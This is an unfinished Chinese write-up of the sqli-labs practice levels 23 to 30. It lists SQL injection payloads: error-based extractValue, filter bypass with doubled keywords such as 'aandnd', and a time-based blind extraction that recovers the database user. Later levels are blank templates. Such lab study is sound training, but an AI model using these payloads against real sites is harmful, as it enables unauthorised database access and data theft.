sqli 靶场 Level23-Level30 wp

level-23 (注释被过滤)

  1. 抓包,查看正常请求和响应。

  2. 尝试是否存在注入

    • id=1’,id=1’',成周期性变化

    sqli 靶场 Level23-Level30 wp_第1张图片

  3. 尝试 POC

  • POC: id=1'+and+extractValue(1,concat(0x7e,user()))--+'

sqli 靶场 Level23-Level30 wp_第2张图片

结果:failed。怀疑–被过滤掉了,尝试前后闭合方案

  • POC: id=1'+and+extractValue(1,concat(0x7e,user()))+and+'

sqli 靶场 Level23-Level30 wp_第3张图片

​ 结果:ok。

level-24(二次注入)

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-25 (and、or被过滤)

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

    ''存在

  3. 尝试POC

  • POC:id=-1'+or+extractValue(1,concat(0x73,user()))--+

发现and,or关键字被屏蔽了,还是不区分大小写的屏蔽

sqli 靶场 Level23-Level30 wp_第4张图片
sqli 靶场 Level23-Level30 wp_第5张图片

  • 使用union

sqli 靶场 Level23-Level30 wp_第6张图片

结果:成功注入

  • 使用aandnd/anandd --> and

POC: id=-1'+aandnd+extractValue(1,concat(0x73,user()))--+

sqli 靶场 Level23-Level30 wp_第7张图片

level-25a(and、or被过滤盲注)

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

​ 存在

  • POC:id=1' and if(1,sleep(3),sleep(0))--+

    ==>不休眠

  • POC:id=1" and if(1,sleep(3),sleep(0))--+

​ ==>休眠

  • POC:id=1 and if(1,sleep(3),sleep(0))--+
  1. 尝试POC

    • step1: 猜字符串长度:POC: id=1+aandnd+if(length(user())=§1§,sleep(3),0)--+

sqli 靶场 Level23-Level30 wp_第8张图片

​ ==》14

  • step2:猜每个字符: POC: id=1+aandnd+if(substr(user(),§1§,1)='§a§',sleep(3),0)--+

sqli 靶场 Level23-Level30 wp_第9张图片

​ ==》root@localhost

level-26 (空格、注释被过滤)

  1. 抓包,查看正常请求和响应

sqli 靶场 Level23-Level30 wp_第10张图片

  1. 尝试是否存在注入
  • 使用单双引号,发现输出周期性变化,存在注入
  1. 尝试POC
  • POC: '+union+select+1,user(),3--+

==> 空格被过滤了

sqli 靶场 Level23-Level30 wp_第11张图片

  • 尝试

level-26a ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-27 ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-27a ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-28 ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-28a ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-29 ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

level-30 ()

  1. 抓包,查看正常请求和响应

  2. 尝试是否存在注入

  3. 尝试POC

你可能感兴趣的:(网络安全,数据库,mybatis,spring)